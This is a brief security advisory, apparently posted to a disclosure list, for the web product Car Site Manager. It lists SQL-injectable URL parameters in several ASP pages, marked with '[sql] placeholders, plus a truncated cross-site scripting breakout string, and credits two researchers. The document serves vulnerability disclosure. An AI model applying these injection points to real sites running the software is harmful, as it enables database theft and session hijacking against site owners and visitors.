| 
 | 
Car Site Manager [injection sql & xss (get)]
vendor site:http://www.mginternet.com/ 
product:Car Site Manager
bug:injection sql
risk:medium
injection sql :
http://site.com/csm/asp/detail.asp?l=&p='[sql] 
http://site.com/csm/asp/listings.asp?l='[sql] 
http://site.com/csm/asp/listings.asp?s=search&typ='[sql] 
http://site.com/csm/asp/listings.asp?s=search&typ=4&loc='[sql] 
xss (get):
http://site.com/csm/asp/listings.asp?s='"> 
laurent gaffi=E9 & benjamin moss=E9
http://s-a-p.ca/ 
contact: saps.audit@gmail.com